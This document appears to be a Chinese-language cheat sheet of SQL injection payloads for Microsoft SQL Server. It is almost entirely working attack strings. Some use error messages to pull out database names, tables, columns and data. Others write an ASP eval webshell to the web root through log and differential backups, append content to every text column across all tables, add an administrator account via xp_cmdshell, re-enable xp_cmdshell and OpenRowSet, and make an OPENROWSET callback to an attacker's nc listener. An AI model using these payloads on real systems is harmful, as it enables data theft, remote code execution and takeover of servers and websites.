and (select top 1 name from (select top 1 name from qds114576626_db..sysobjects where xtype=0X75 order by name) t order by name desc)=0
and (select top 1 quotename(name) from qds114576626_db.dbo.sysobjects where xtype=char(85) AND name not in (select top 2 name from qds114576626_db.dbo.sysobjects where xtype=char(85)))=0
and db_name()=0 会报错:在将nvarchar 值'test' 转换成数据类型int 时失败。从而得到数据库的名字
and db_name()='master' 通过后面的and条件是否出错来影响查询的执行
and SUBSTRING(DB_NAME(),1,1)='t'
select name from test.dbo.tea where ID=1 and DB_NAME(x)=0
and user=0
and @@version=0
and @@servername=0
and @@servicename=0
and system_user=0
AnD (dB_NaMe(0)+cHaR(124)+uSeR+cHaR(124)+@@vErSiOn+cHaR(124)+@@sErVeRnAmE+cHaR(124)+@@sErViCeNaMe+cHaR(124)+sYsTeM_UsEr)=0
AnD (cAsT(iS_srvrOlEmEmBeR(0x730079007300610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x64006200630072006500610074006f007200)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x620075006c006b00610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x6400690073006b00610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x730065007200760065007200610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x7000750062006c0069006300) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006f0077006e0065007200) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006200610063006b00750070006f00700065007200610074006f007200) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006400610074006100770072006900740065007200) aS vArChAr))=0
■获取数据库的数目 这里用cast()函数进行了类型转换,以便在后面能够出错
AnD (sElEcT cAsT(cOuNt(1) aS nvArChAr(100))+cHaR(9) FrOm mAsTeR..sYsDaTaBaSeS)=0
and (select top 1 filename from (select top __i__ filename from master..sysdatabases order by filename) t order by filename desc)=0 <__i__表示单个数字1,2,3>
AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(nAmE aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(filenAmE aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__ nAmE,filenAmE FrOm mAsTeR..sYsDaTaBaSeS oRdEr bY nAmE) t oRdEr bY nAmE dEsC)=0
and (select cast(count(1) as varchar)+char(9) from <数据库名>..sysobjects where xtype=0x75)=0
■获取数据库的表 <一次只能查一个,所以只能not in 逐个>
and (select top 1 name from (select top __i__ name from <数据库名>..sysobjects where xtype=0X75 order by name) t order by name desc)=0
and (select top 1 quotename(name) from <数据库名>.dbo.sysobjects where xtype=char(85) AND name not in (select top __i__ name from <数据库名>.dbo.sysobjects where xtype=char(85)))=0
and (select cast(count(1) as varchar)+char(9) from <数据库名>..syscolumns where id=object_id('<表名>'))=0
and (select top 1 name from (select top __i__ name,id from <数据库名>..syscolumns where id=object_id('<表名>') order by name) t order by name desc)=0
and (select col_name(object_id('<表名>'),__i__))=0 这句要方便一些,通过递增_i_即可,不用先读字段数
AnD (sElEcT cAsT(cOuNt(1) aS nvArChAr(100))+cHaR(9) FrOm <数据库名>..<表名>)=0
■获取数据库的内容 <也只能取出多个列的第一个数据>
AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(<列名1> aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(<列名2> aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(<列名3> aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__ <列名1>,<列名2>,<列名3> FrOm <数据库名>..<表名> oRdEr bY <排序列名>) t oRdEr bY <排序列名> dEsC)=0
-- 1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt ( a image ) Backup Log TestDB to disk = '<临时文件名:e:\wwwroot\m.asp>' With Init --
-- 2. 插入数据
; Insert Into ttt Values ( 0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E )--
-- 3. 备份并获得文件,删除临时表
; Backup Log <数据库名> To Disk = '<要生成的文件名:e:\wwwroot\m.asp>' ; Drop Table ttt Alter Database TestDB Set Recovery SIMPLE --
1. 进行差异备份准备工作
; Declare @a Sysname ; Set @a = db_name (); Declare @file VarChar ( 400 ); Set @file =<临时文件名: 0x633A5C617364662E617370 >; Drop Table ttt Create Table ttt ( c Image ) Backup Database @a To Disk = @file --
2. 将数据写入到数据库
; Insert Into ttt Values ( 0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E )--
3. 备份数据库并作最后的清理工作
; Declare @b SysName ; Set @b = db_name (); Declare @file1 VarChar ( 400 ); Set @file1 =<最终需要备份出的文件名: 0x633A5C617364662E617370 >; Backup Database @b To Disk = @file1 With Differential , Format ; Drop Table ttt ;--
备份数据库 getshell
http : //';execute('ins'%2b'ert into test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA);') -- '
http : //';execute('backup database web1 to disk = ''d:\\m.asp''') -- ' 成功
http : //';execute('sele'%2b'ct convert(int,(se'%2b'lect top 1 subdirectory fr'%2b'om (se'%2b'lect top 3 subdirectory fr'%2b'om D99_Tmp order by subdirectory )K order by subdirectory desc))') -- '
;update <数据库名>..<表名> set <字段名>=<字段名>+'<script>alert("有漏洞啊。")</script>' where <要满足的条件>--
; dEcLaRe @t vArChAr ( 255 ), @c vArChAr ( 255 ) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a . nAmE , b . nAmE FrOm sYsObJeCtS a , sYsCoLuMnS b wHeRe a . iD = b . iD AnD a . xTyPe = 'u' AnD ( b . xTyPe = 99 oR b . xTyPe = 35 oR b . xTyPe = 231 oR b . xTyPe = 167 ) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t , @c while (@ @fEtCh_status = 0 ) bEgIn exec ( 'UpDaTe [' + @t + '] sEt [' + @c + ']=rtrim(convert(varchar,[' + @c + ']))+cAsT(<要插入的内容(0x编码形式)> aS vArChAr(200<此处长度应做相应修改>))' ) fEtCh next FrOm tAbLe_cursoR iNtO @t , @c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR ;--
; DECLARE @T VARCHAR ( 255 ), @C VARCHAR ( 255 ) DECLARE Table_Cursor CURSOR FOR SELECT a . name , b . name FROM sysobjects a , s yscolumns b WHERE a . id = b . id AND a . xtype = 'u' AND ( b . xtype = 99 OR b . xtype = 35 OR b . xtype = 231 OR b . xtype = 167 ) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T , @C WHILE (@ @FETCH_STATUS = 0 ) BEGIN EXEC ( 'UPDATE [' + @T + '] SET [' + @C + ']=RTRIM(CONVERT(VARCHAR(4000),[' + @C + ']))+''<要插入的内容>''' ) FETCH NEXT FROM Table_Cursor INTO @T , @C END CLOSE Table_Cursor DEALLOCATE Table_Cursor --
;exec master..xp_cmdshell 'net user name password /add & net localgroup administrators name /add'--
■恢复存储过程 xp_cmdshell
; Exec Master .. sp_dropextendedproc 0x780070005F0063006D0064007300680065006C006C00 ; Exec Master .. sp_addextendedproc 0x780070005F0063006D0064007300680065006C006C00 , 0x78706C6F6737302E646C6C --
■SQLServer 2005 开启和关闭 xp_cmdshell
; EXEC master .. sp_configure 'show advanced options' , 1 ; RECONFIGURE ; EXEC master .. sp_configure 'xp_cmdshell' , 1 ; RECONFIGURE ;
关闭 xp_cmdshell
; EXEC master .. sp_configure 'show advanced options' , 1 ; RECONFIGURE ; EXEC master .. sp_configure 'xp_cmdshell' , 0 ; RECONFIGURE ;
■SQLServer 2005 开启和关闭 OpenDataSource/OpenRowSet
; EXEC master .. sp_configure 'show advanced options' , 1 ; RECONFIGURE ; EXEC master .. sp_configure 'Ad Hoc Distributed Queries' , 1 ; RECONFIGURE ;
; EXEC master .. sp_configure 'show advanced options' , 1 ; RECONFIGURE ; EXEC master .. sp_configure 'Ad Hoc Distributed Queries' , 0 ; RECONFIGURE ;
■SQLServer 2005 日志差异备份
alter database [ testdb ] set recovery full
declare @d nvarchar ( 4000 ) set @d = 0x640062006200610063006B00 backup database __dbname__ to disk = @d with init --
drop table [ itpro ]--
create table [ itpro ]([ a ] image )--
declare @d nvarchar ( 4000 ) set @d = 0x640062006200610063006B00 backup log __dbname__ to disk = @d with init --
insert into [ itpro ]([ a ]) values ( __varchar (木马内容))--
declare @d nvarchar ( 4000 ) set @d = __nvarchar (文件名) backup log __dbname__ to disk = @d with init --
drop table [ itpro ] declare @d nvarchar ( 4000 ) set @d = 0x640062006200610063006B00 backup log __dbname__ to disk = @d with init --
NC 监听 80 端口: nc - vvlp 80 (反连看 IP ,自己机器并不一定要有装 MSSQL 的),在注射点上注射如下语句:
; insert into OPENROWSET ( 'SQLOLEDB' , 'uid=sa;pwd=netpatch;Network=DBMSSOCN;Address=,80;' , 'select * from dest_table' ) select * from src_table ;--
因为我们只要看 IP ,所以其他的参数就无所谓了。而端口设置成 80 ,是为了预防一些机器只让访问外部 80 。